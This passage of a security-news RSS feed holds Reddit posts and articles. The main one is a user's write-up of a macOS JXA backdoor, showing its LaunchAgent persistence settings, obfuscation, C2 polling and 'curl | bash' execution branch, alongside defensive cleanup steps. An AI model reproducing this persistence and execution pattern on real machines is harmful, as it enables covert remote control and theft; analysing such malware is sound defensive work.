<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fatihaziz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fatihaziz">@fatihaziz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5041900066" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7371" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7371/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7371">#7371</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paolofraz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paolofraz">@paolofraz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042500693" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7390" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7390/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7390">#7390</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrianHotopp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrianHotopp">@BrianHotopp</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5043632395" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7394" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7394/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7394">#7394</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dannyboy-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dannyboy-ai">@dannyboy-ai</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040310027" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7342" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7342/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7342">#7342</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v17.2.4...v17.2.5">v17.2.4...v17.2.5</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I open-sourced CyvoraX Suite, a Java-based web security workbench. I'd appreciate technical feedback.]]></title>
<description><![CDATA[Hi everyone, I've been working on an open-source desktop application called CyvoraX Suite and recently released the latest version. The project is built with Java 17, JavaFX, and Netty, with additional native components written in Rust, Go, C, C++, and C#. Current features include: • MITM interce...]]></description>
<link>https://tsecurity.de/de/3700233/malware-trojaner-viren/i-open-sourced-cyvorax-suite-a-java-based-web-security-workbench-id-appreciate-technical-feedback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700233/malware-trojaner-viren/i-open-sourced-cyvorax-suite-a-java-based-web-security-workbench-id-appreciate-technical-feedback/</guid>
<pubDate>Mon, 03 Aug 2026 10:23:24 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi everyone,</p> <p>I've been working on an open-source desktop application called CyvoraX Suite and recently released the latest version.</p> <p>The project is built with Java 17, JavaFX, and Netty, with additional native components written in Rust, Go, C, C++, and C#.</p> <p>Current features include:</p> <p>• MITM interception proxy</p> <p>• HTTP request/response editing</p> <p>• Site mapping</p> <p>• Payload fuzzing</p> <p>• AI-assisted security analysis</p> <p>I'm sharing it here to get technical feedback from the open-source community.</p> <p>I'd especially appreciate thoughts on:</p> <p>- Project architecture</p> <p>- Code organization</p> <p>- Performance</p> <p>- Documentation</p> <p>- Features that would make the project more useful</p> <p>Repository:</p> <p><a href="https://github.com/jojin1709/CyvoraX-Suite">https://github.com/jojin1709/CyvoraX-Suite</a></p> <p>Documentation:</p> <p><a href="https://jojin1709.github.io/CyvoraX-Suite/">https://jojin1709.github.io/CyvoraX-Suite/</a></p> <p>Thanks for taking a look. Any constructive feedback is appreciated.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Massive_Painting_600"> /u/Massive_Painting_600 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1vbeobq/i_opensourced_cyvorax_suite_a_javabased_web/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1vbeobq/i_opensourced_cyvorax_suite_a_javabased_web/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 months of undetected JXA backdoor on macOS. signature scanners found nothing, manual persistence check found it in 10 seconds]]></title>
<description><![CDATA[Background: developer, cybersecurity basics but not a security professional. Working on a M Chip Mac. Posting as a writeup and to sanity-check my analysis and response. Discovery Auditing login items in ~/Library/LaunchAgents/. Normally vendor-named (com.google.keystone.agent), but one entry was ...]]></description>
<link>https://tsecurity.de/de/3700237/malware-trojaner-viren/5-months-of-undetected-jxa-backdoor-on-macos-signature-scanners-found-nothing-manual-persistence-check-found-it-in-10-seconds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700237/malware-trojaner-viren/5-months-of-undetected-jxa-backdoor-on-macos-signature-scanners-found-nothing-manual-persistence-check-found-it-in-10-seconds/</guid>
<pubDate>Mon, 03 Aug 2026 10:23:24 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Background: developer, cybersecurity basics but not a security professional. Working on a M Chip Mac. Posting as a writeup and to sanity-check my analysis and response.</p> <h1>Discovery</h1> <p>Auditing login items in <code>~/Library/LaunchAgents/</code>. Normally vendor-named (<code>com.google.keystone.agent</code>), but one entry was a bare 32-character hex string pointing to a JS file in an identically-named directory.</p> <p>xml</p> <pre><code>ProgramArguments: /usr/bin/osascript -l JavaScript ~/Library/Application Support/&lt;hex&gt;/&lt;hex&gt;.js RunAtLoad: true KeepAlive: true ThrottleInterval: 60 StandardOutPath: /dev/null StandardErrorPath: /dev/null </code></pre> <p><code>RunAtLoad</code>/<code>KeepAlive</code> = starts at login, respawns on crash. Both output paths to <code>/dev/null</code> = zero logging by design.</p> <h1>The payload</h1> <p>Obfuscated (string-array rotation, <code>a0_0x...</code> identifiers, anti-beautify self-check, console hijacking). Working through it:</p> <p><strong>Fingerprinting:</strong> MD5 of the hardware UUID sent as User-Agent — stable per-host ID, survives reinstalls.</p> <p><strong>Polling:</strong> <code>curl</code> to a random-looking C2 domain every 60s via <code>/api/poll</code>.</p> <p><strong>Proof-of-work gating:</strong> server sends a challenge + difficulty; client brute-forces a nonce until <code>SHA256(nonce-challenge)</code> hits N leading zeros before getting a session token. Not security — anti-analysis. Burns sandbox CPU and filters out short-lived research environments.</p> <p><strong>Execution:</strong> response <code>type</code> field branches to <code>osascript -l JavaScript</code>, <code>osascript</code> (AppleScript), or <code>curl | bash</code> — all backgrounded, output discarded, payloads piped via stdin so nothing hits disk.</p> <p><strong>Ack loop:</strong> separate PUT confirming task completion, same PoW handling.</p> <h1>Key point</h1> <p>No credential-harvesting code, no keylogger, no exfil routine — <strong>it's a generic execution channel</strong>. What it did over 5 months is entirely dependent on what was pushed to it, and unknowable since nothing was logged.</p> <p>Running as user (no root) but with <code>osascript</code>, reachable surface on a dev box: git tokens in <code>.git/config</code>, passphrase-less SSH keys, <code>.env</code> files, certs on disk, unprotected keychain items (plus AppleScript can render fake password prompts for protected ones), browser cookies/sessions, and screen capture. Secure Enclave–bound passkeys/Touch ID items held — not reachable by a software process, any attempt triggers an unspoofable OS prompt.</p> <p>Install date (Spotlight <code>kMDItemDateAdded</code>): Feb 13. Found late July — ~5.5 months.</p> <h1>Why detection failed</h1> <p>Commercial AV installed the whole time; ran ClamAV afterward too. <strong>Zero detections, both, even knowing the exact path.</strong> Signature engines hash/pattern-match against known-bad corpora — useless against a bespoke, obfuscated, one-off sample. Nothing here is structurally illegal either: <code>osascript</code> is first-party Apple, a <code>.js</code> file + LaunchAgent plist are ordinary primitives. Only the naming convention and combination were anomalous — semantic signals a heuristic/behavioral engine could catch, not a signature one.</p> <p>The actual detection method: <code>ls -la ~/Library/LaunchAgents/</code>.</p> <h1>Forensics: mostly a dead end</h1> <p><code>LSQuarantineEvent</code> DB empty for that window (suggests the file was written by a running process, not browser-downloaded), Downloads/browser history clean, <code>.zsh_history</code> rotated out (<code>SAVEHIST=1000</code>), npm logs only back to July, unified log retention nowhere near 5 months, Time Machine's oldest backup postdates the incident.</p> <p>Ruled out: no ClickFix-style paste-into-terminal.</p> <p>What lines up temporally: a short GitHub Copilot session that evening, working on a payments API integration — chat history long gone. Circumstantial, not proof. But there are documented issues with AI coding agents: indirect prompt injection leading to unapproved shell execution, hidden-unicode instructions in config/rules files, hallucinated package names pre-registered by attackers. A compromised npm <code>postinstall</code> hook is equally plausible. Genuinely don't know.</p> <p><strong>Response:</strong></p> <p><strong>Containment:</strong> unloaded LaunchAgent, killed process, removed plist + payload dir.</p> <p><strong>Verification (4 independent passes):</strong></p> <ul> <li>KnockKnock (structural persistence enumeration, checks code signing) — everything else attributable/notarized</li> <li>Reboot + <code>launchctl list | grep -v</code> <a href="http://com.apple/"><code>com.apple</code></a>, checked for live <code>osascript</code>: clean</li> <li>ClamAV full scan: 0 infected</li> <li>Manual checks: <code>authorized_keys</code> (didn't exist), SSH config, git hooks, config profiles, BTM database (<code>sfltool dumpbtm</code>), shell startup files, crontab, <code>/tmp</code></li> </ul> <p>No second-stage persistence found — consistent with the code having no propagation/redundancy logic.</p> <p><strong>Remediation</strong> (assuming worst case, since visibility is zero): new SSH keypair with passphrase, all API keys rotated (including a service-role key bypassing RLS), certs reissued and moved out of cloud sync, passwords rotated by 2FA priority, audited 2FA actually enforced (not just "enabled once"), card reissued, WiFi password changed, sessions invalidated globally.</p> <p><strong>Hardening:</strong> the real gap was egress — macOS's firewall is inbound-only. Installed LuLu (outbound filtering) + BlockBlock (real-time persistence monitor). Either would've caught this on day one.</p> <p><strong>Questions</strong></p> <ol> <li>Is my read on the detection failure right — no signature entry exists for bespoke malware, nothing structurally anomalous for generic heuristics? Would an EDR with behavioral telemetry have flagged the <code>osascript</code> + LaunchAgent + periodic egress pattern?</li> <li>Was skipping a full reinstall defensible given 4 clean verification passes and no propagation logic, or is that too much trust after 5.5 months of arbitrary execution?</li> <li>Anything missing from the rotation list?</li> <li>Anyone seen a documented case (not speculation) of an AI coding agent confirmed as initial access vector?</li> <li>Is PoW-gated C2 polling common in the wild, or unusually deliberate for otherwise commodity-looking tooling?</li> </ol> <p>Takeaway: AV protects against things that already have names. This didn't. What worked was ten seconds looking at what actually starts on my machine.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Silver-Security-2233"> /u/Silver-Security-2233 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1vasiff/5_months_of_undetected_jxa_backdoor_on_macos/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1vasiff/5_months_of_undetected_jxa_backdoor_on_macos/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[XCSSET v40 Infects Xcode Projects to Hijack Chrome and Trojanize Telegram on Macs]]></title>
<description><![CDATA[XCSSET v40 marks a significant escalation in macOS-focused supply chain attacks, weaponizing poisoned Xcode projects to hijack Chrome and Trojanize Telegram while operating almost entirely from memory with aggressive polymorphism and defense evasion. After several months of apparent inactivity, t...]]></description>
<link>https://tsecurity.de/de/3700214/hacking/xcsset-v40-infects-xcode-projects-to-hijack-chrome-and-trojanize-telegram-on-macs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700214/hacking/xcsset-v40-infects-xcode-projects-to-hijack-chrome-and-trojanize-telegram-on-macs/</guid>
<pubDate>Mon, 03 Aug 2026 10:23:00 +0200</pubDate>
<content:encoded><![CDATA[<p>XCSSET v40 marks a significant escalation in macOS-focused supply chain attacks, weaponizing poisoned Xcode projects to hijack Chrome and Trojanize Telegram while operating almost entirely from memory with aggressive polymorphism and defense evasion. After several months of apparent inactivity, the actors behind the XCSSET malware resurfaced with version 40 (v40), a major re-architecture of the […]</p>
<p>The post <a href="https://gbhackers.com/xcsset-v40-infects-xcode-projects/">XCSSET v40 Infects Xcode Projects to Hijack Chrome and Trojanize Telegram on Macs</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[XCSSET v40 Infects Xcode Projects to Hijack Chrome and Trojanize Telegram on Macs]]></title>
<description><![CDATA[XCSSET v40 marks a significant escalation in macOS-focused supply chain attacks, weaponizing poisoned Xcode projects to hijack Chrome and Trojanize Telegram while operating almost entirely from memory with aggressive polymorphism and defense evasion. After several months of apparent inactivity, t...]]></description>
<link>https://tsecurity.de/de/3700202/it-security-nachrichten/xcsset-v40-infects-xcode-projects-to-hijack-chrome-and-trojanize-telegram-on-macs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700202/it-security-nachrichten/xcsset-v40-infects-xcode-projects-to-hijack-chrome-and-trojanize-telegram-on-macs/</guid>
<pubDate>Mon, 03 Aug 2026 10:21:53 +0200</pubDate>
<content:encoded><![CDATA[<p>XCSSET v40 marks a significant escalation in macOS-focused supply chain attacks, weaponizing poisoned Xcode projects to hijack Chrome and Trojanize Telegram while operating almost entirely from memory with aggressive polymorphism and defense evasion. After several months of apparent inactivity, the actors behind the XCSSET malware resurfaced with version 40 (v40), a major re-architecture of the […]</p>
<p>The post <a href="https://gbhackers.com/xcsset-v40-infects-xcode-projects/">XCSSET v40 Infects Xcode Projects to Hijack Chrome and Trojanize Telegram on Macs</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My account got hacked on several applications]]></title>
<description><![CDATA[One of my younger siblings used a pirate site where they used the powershell program idk i used chat gpt to see whatsup . Following that ny instagram got hacked in like 30 mins then i changed all the passowrds and logged out of everywhere , proceeding that my linkdin was hacked and compromised th...]]></description>
<link>https://tsecurity.de/de/3700126/it-security-nachrichten/my-account-got-hacked-on-several-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700126/it-security-nachrichten/my-account-got-hacked-on-several-applications/</guid>
<pubDate>Mon, 03 Aug 2026 10:18:04 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>One of my younger siblings used a pirate site where they used the powershell program idk i used chat gpt to see whatsup . Following that ny instagram got hacked in like 30 mins then i changed all the passowrds and logged out of everywhere , proceeding that my linkdin was hacked and compromised then discord then they cancelled my spotify premium plan idk why then i figured that i might have to clear my laptop completely in and out they even tried to login into facebook but it wasnt able to. I saw my telegram and saw a login from warsaw poland which is definetely not my loaction .</p> <p>So i went down and secured everything and clean my laptop . </p> <p>But today they logged in into my microsoft account even after i had reinstalled my windows does that means the virus is still there somewhere or they still have access to my gmail account cause i believe they were able to steal passowords for different applications. What other precations should i take to prevent it again now cause my windows is damn clean .</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Feeling_Ad5244"> /u/Feeling_Ad5244 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1vd8m8v/my_account_got_hacked_on_several_applications/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1vd8m8v/my_account_got_hacked_on_several_applications/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[BrainDrain: A Chrome extension that collects your AI prompts without you ever opening it and has 100k users, 9 AI platforms]]></title>
<description><![CDATA["Prompt Optimizer - SecondBrain" (aajjgdpofhhcjmjoombjdfepplndhgcp, v2.3.1). The prompt rewriting works fine. Alongside it a capture engine runs at document_start on 9 AI sites and POSTs prompts and replies to the vendor's ingest endpoint. No interaction with the extension required. Reproduced on...]]></description>
<link>https://tsecurity.de/de/3700131/it-security-nachrichten/braindrain-a-chrome-extension-that-collects-your-ai-prompts-without-you-ever-opening-it-and-has-100k-users-9-ai-platforms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700131/it-security-nachrichten/braindrain-a-chrome-extension-that-collects-your-ai-prompts-without-you-ever-opening-it-and-has-100k-users-9-ai-platforms/</guid>
<pubDate>Mon, 03 Aug 2026 10:18:04 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>"Prompt Optimizer - SecondBrain" (<a href="https://chromewebstore.google.com/detail/prompt-optimizer-secondbr/aajjgdpofhhcjmjoombjdfepplndhgcp">aajjgdpofhhcjmjoombjdfepplndhgcp</a>, v2.3.1). The prompt rewriting works fine.<br> Alongside it a capture engine runs at <code>document_start</code> on 9 AI sites and POSTs prompts and replies to the vendor's ingest endpoint. No interaction with the extension required.</p> <p>Reproduced on a clean profile, with the service worker devtools open:</p> <ol> <li>Installed the extension. Never opened it.</li> <li>Browsed to an unrelated site. The extension pulled its configuration from the server and wrote a userId and credentials into extension storage.</li> <li>Opened ChatGPT and asked a question. Once the reply finished, a POST to <code>/context</code> went out carrying both the prompt and the response, encrypted with the credentials issued in step 2.</li> </ol> <p><strong>At no point was the extension opened or clicked.</strong></p> <p>Store privacy declaration: "The developer has disclosed that it will not collect or use your data."</p> <p>Write-up : <a href="https://malext.io/reports/BrainDrain/">https://malext.io/reports/BrainDrain/</a></p> <p>If anyone interested in testing it in a sandbox I can share the decryption script for the /context</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Huge-Skirt-6990"> /u/Huge-Skirt-6990 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1v85odz/braindrain_a_chrome_extension_that_collects_your/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1v85odz/braindrain_a_chrome_extension_that_collects_your/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Teams are Spending 11 Hours a Week on Cloud Connectivity Problems]]></title>
<description><![CDATA[Researchers found enterprises are spending time troubleshooting cloud connectivity due to increased AI workloads, reports Computer Weekly. More than 400 IT and infrastructure decision-makers (US and UK) were surveyed for internet/cloud/AI exchange operator DE-CIX by market researchers Censuswide....]]></description>
<link>https://tsecurity.de/de/3700100/it-security-nachrichten/it-teams-are-spending-11-hours-a-week-on-cloud-connectivity-problems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3700100/it-security-nachrichten/it-teams-are-spending-11-hours-a-week-on-cloud-connectivity-problems/</guid>
<pubDate>Mon, 03 Aug 2026 10:17:50 +0200</pubDate>
<content:encoded><![CDATA[Researchers found enterprises are spending time troubleshooting cloud connectivity due to increased AI workloads, reports Computer Weekly. More than 400 IT and infrastructure decision-makers (US and UK) were surveyed for internet/cloud/AI exchange operator DE-CIX by market researchers Censuswide. But despite 96% of respondents claiming their enterprise networks are ready for cloud/AI loads, the average IT team still spends more than 11 hours each week resolving cloud connectivity problems


Other leading concerns included downtime or reliability issues (26%), latency or slow performance (28%), and security vulnerabilities/DDoS attacks (27%). Cost of connectivity, staff expertise and lack of visibility/control over data flows were also cited as major challenges... As a result, as indicated in the study, many businesses are now turning to private interconnection, which enables enterprises to connect directly to cloud providers over dedicated infrastructure rather than routing traffic across the public Internet. Designed to deliver lower latency, greater resilience, enhanced security and more predictable performance, private interconnection has become an increasingly important way of supporting modern cloud and AI workloads. Specifically, the data showed that 61% of companies are already using private connectivity to clouds, while another 31% are actively considering it... [And 71% of enterprises with 1000 or more employees] 

Only 8.62% of the smaller companies were spending 21 to 40 hours per week dealing with connectivity issues, while just 2.53% of the largest companies in the sample do. Summing up these findings, DE-CIX said that together they suggest direct interconnection is rapidly becoming a core component of enterprise cloud and AI infrastructure and a competitive advantage for companies, though optimising interconnection strategies clearly remains a pressing challenge for small and medium-sized enterprises... "Every AI application depends on data moving quickly, securely and predictably between users, clouds and AI infrastructure. Our research suggests that far too many enterprises are still spending valuable time trying to maintain that kind of connectivity, with more than a third spending between 11 and 20 hours per week, and just under one in 10 spending between 21 to 40 hours per week. This confirms what we already knew — that that network architecture can make or break AI adoption."
 

Elsewhere The Register reports that cloud infrastructure services "grew at their fastest for eight years during the second quarter of 2026, thanks to the AI craze and continued demand for flexible and scalable IT infrastructure."

According to the latest figures from Synergy Research, enterprise spending on cloud infrastructure passed $143 billion in Q2, a year-on-year growth rate of 43 percent. This followed 11 successive quarters of increasing growth rates, during which the market has now doubled in size... "AI has, of course, driven most of that incremental growth, and we now see year-on-year growth rates of 165 percent for AI-specific cloud services...." And the top three global players continue to dominate the market, with Amazon Web Services (AWS), Microsoft Azure and Google Cloud together accounting for 67 percent of all the cloud revenue during the quarter. That percentage has increased since the third quarter of last year, when the triumvirate made up 63 percent of enterprise cloud infra spending.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=IT+Teams+are+Spending+11+Hours+a+Week+on+Cloud+Connectivity+Problems%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F02%2F2331237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F02%2F2331237%2Fit-teams-are-spending-11-hours-a-week-on-cloud-connectivity-problems%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/08/02/2331237/it-teams-are-spending-11-hours-a-week-on-cloud-connectivity-problems?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why observability matters to frontend teams more than they think]]></title>
<description><![CDATA[For a long time, I thought of observability as something mainly owned by backend, platform or site reliability teams. Frontend engineers built the interface, handled browser behavior and called APIs. When something failed deeper in the system, another team looked at server logs and infrastructure...]]></description>
<link>https://tsecurity.de/de/3699898/ai-nachrichten/why-observability-matters-to-frontend-teams-more-than-they-think/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699898/ai-nachrichten/why-observability-matters-to-frontend-teams-more-than-they-think/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For a long time, I thought of observability as something mainly owned by backend, platform or site reliability teams. Frontend engineers built the interface, handled browser behavior and called APIs. When something failed deeper in the system, another team looked at server logs and infrastructure dashboards.</p>



<p class="wp-block-paragraph">That division works until the application is technically available, but the user experience is not.</p>



<p class="wp-block-paragraph">A page may load while its most important data arrives several seconds late. A request may succeed after multiple retries, leaving the user staring at a spinner. One cloud service may slow down while the rest of the page continues working. From an infrastructure perspective, nothing may qualify as an outage. From the user’s perspective, the application is already failing.</p>



<p class="wp-block-paragraph">As I gained more experience building applications that depended on cloud services and APIs, my view of frontend ownership changed. A frontend team does not need to operate every service it depends on, but it does need enough visibility to understand how those services affect the experience it delivers.</p>



<p class="wp-block-paragraph">Observability gives frontend engineers that visibility. It helps connect what happens in the browser with what happens across the systems behind it. More importantly, it gives teams evidence they can use not only to debug problems, but also to make better decisions about how the frontend should behave when dependencies are slow, unavailable or inconsistent.</p>



<h2 class="wp-block-heading">The browser sees a different version of the system</h2>



<p class="wp-block-paragraph">Server-side monitoring tells us what happened inside a service. It does not always tell us what happened across the user’s complete journey.</p>



<p class="wp-block-paragraph">A backend dashboard might show that an API responded in 300 milliseconds. The browser may still take much longer to display useful content because of network latency, JavaScript execution, rendering work or additional requests. A successful response can also produce a broken experience if the returned data is incomplete or the interface fails while processing it.</p>



<p class="wp-block-paragraph">This is why client-side telemetry matters. Browser error reporting can capture exceptions that never reach a server. Performance measurements can show how long users wait for content to become visible or interactive. Request data can reveal which dependencies are slow, unreliable or frequently retried.</p>



<p class="wp-block-paragraph">Standard browser APIs provide useful starting points. The<a href="https://www.w3.org/TR/user-timing/"> </a><a href="https://www.w3.org/TR/user-timing/">W3C User Timing API</a> allows developers to mark and measure meaningful operations in an application. A team can measure how long it takes to load a dashboard, complete a search or render a critical section of a page.</p>



<p class="wp-block-paragraph"><a href="https://web.dev/articles/vitals">Web Vitals</a> can also help teams examine loading performance, responsiveness and visual stability using measurements tied more closely to the user experience. These metrics are useful because they move the conversation beyond whether a request succeeded. They help answer whether the page became useful quickly and respond when the user tried to interact with it.</p>



<p class="wp-block-paragraph">The goal is not to collect every browser event. That can produce a large amount of data without producing much insight. It is better to begin with a small set of questions.</p>



<p class="wp-block-paragraph">How long does the user wait before the main content appears? How often does a form submission fail? Which request prevents a page from becoming usable? Are users on certain devices or network conditions affected more often?</p>



<p class="wp-block-paragraph">These questions make telemetry easier to design and easier to interpret. “The API is available” is a service-level statement. “The user can complete the task without an unexpected delay” is an experience-level statement. Frontend observability helps connect the two.</p>



<h2 class="wp-block-heading">Logs and traces connect the frontend to its dependencies</h2>



<p class="wp-block-paragraph">Client-side logs are most valuable when they include enough context to reconstruct what the user was doing. A useful error record might include the application version, route, operation, request status and a correlation identifier. Browser information may also help when an issue affects only certain environments.</p>



<p class="wp-block-paragraph">At the same time, frontend telemetry should be designed carefully. Logs should avoid form contents, authentication tokens, passwords and other sensitive information. Collecting more data does not automatically make an investigation easier. The right context is more useful than a large amount of unstructured information.</p>



<p class="wp-block-paragraph">Correlation identifiers are particularly helpful. When the frontend includes an identifier with a request and that identifier continues through downstream services, teams can connect a browser failure to backend logs and distributed traces. Instead of comparing timestamps across several dashboards, engineers can follow one request across the system.</p>



<p class="wp-block-paragraph">A distributed trace can show that a user action triggered an API gateway, an application service, a database call and another cloud dependency. It can also show where the request spent most of its time or where an error first appeared.</p>



<p class="wp-block-paragraph"><a href="https://opentelemetry.io/docs/">OpenTelemetry</a> provides a vendor-neutral approach for generating and connecting telemetry such as traces, metrics and logs. It also supports JavaScript and browser instrumentation, which makes it relevant to frontend teams that want to connect browser activity with backend services.</p>



<p class="wp-block-paragraph">Frontend engineers do not need to become observability platform specialists. They do need agreement with backend and platform teams on basics such as trace propagation, naming conventions, safe logging fields and where telemetry can be reviewed during an investigation.</p>



<p class="wp-block-paragraph">Consider a page that occasionally loads without its main data. The frontend may record that a critical request timed out after several seconds. A correlation identifier from that request may lead to a trace showing that the gateway responded normally, but a downstream dependency exceeded its timeout.</p>



<p class="wp-block-paragraph">Without connected telemetry, the report might remain, “The page sometimes does not load.” With connected telemetry, the team has a specific failure path, a measurable delay and enough evidence to decide what needs to change.</p>



<p class="wp-block-paragraph">That evidence can support two actions. The service team can investigate the slow dependency. The frontend team can improve the experience by adding a timeout state, retry option or partial fallback. Observability makes both responses more precise.</p>



<h2 class="wp-block-heading">Observability should influence architecture, not only debugging</h2>



<p class="wp-block-paragraph">The immediate benefit of observability is faster incident investigation. The larger benefit is better architectural decision-making.</p>



<p class="wp-block-paragraph">When telemetry repeatedly shows that one dependency is slow, the frontend team can reconsider how tightly the interface depends on it. The page might render primary content first and load secondary information later. Cached data might be acceptable for a noncritical section. A timeout might lead to a smaller fallback instead of blocking the entire screen.</p>



<p class="wp-block-paragraph">Observability can also expose hidden coupling. If unrelated components fail whenever one shared request slows down, the page may have been designed as a single loading unit. Breaking the experience into independently recoverable sections can make the interface more resilient.</p>



<p class="wp-block-paragraph">The same evidence can improve retry behavior. Automatic retries may help with a temporary network failure, but they can also add more traffic to an already slow service. Telemetry can show whether retries recover requests, how long the recovery takes and whether users leave the page before it succeeds.</p>



<p class="wp-block-paragraph">Service-level visibility matters as well. Frontend teams should understand the availability and latency expectations of the services they use. They should also understand what those services return during partial failures.</p>



<p class="wp-block-paragraph">If a dependency may respond slowly, the interface needs a loading strategy. If data may be stale, the interface needs to communicate freshness. If a service is optional, the page should not collapse when it is unavailable.</p>



<p class="wp-block-paragraph">Good observability also improves conversations between teams. Instead of saying, “The page feels slow,” frontend engineers can explain which user action is affected, how often it happens and where the delay appears. Debugging becomes a discussion based on evidence rather than guesswork.</p>



<p class="wp-block-paragraph">A practical starting point can be small. Capture unhandled browser errors. Measure a few important user journeys. Record failures for critical network requests. Propagate a correlation identifier across frontend and backend systems. Review those signals with the teams that own dependent services.</p>



<p class="wp-block-paragraph">From there, instrumentation should grow in response to real questions. Add a measurement when a workflow is difficult to understand. Add a trace when a request crosses several systems. Add a dashboard when a signal is important enough to review regularly.</p>



<p class="wp-block-paragraph">Frontend observability is not about turning every frontend engineer into an operations engineer. It is about recognizing that the browser is part of the production system and often the only place where the complete user experience is visible.</p>



<p class="wp-block-paragraph">When frontend teams can connect what users experience with the services behind it, they can debug more effectively, design interfaces that degrade gracefully and make better architectural decisions. Observability becomes more than a way to explain incidents. It becomes an input into how frontend systems are designed.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK says the cloud is financial infrastructure]]></title>
<description><![CDATA[Every cloud architect, every financial services executive, and frankly every enterprise CTO should be paying attention to what is going on in the United Kingdom right now. Britain has formally designated Microsoft, Google, Amazon Web Services, and Oracle as “critical third parties” to the financi...]]></description>
<link>https://tsecurity.de/de/3699900/ai-nachrichten/uk-says-the-cloud-is-financial-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699900/ai-nachrichten/uk-says-the-cloud-is-financial-infrastructure/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
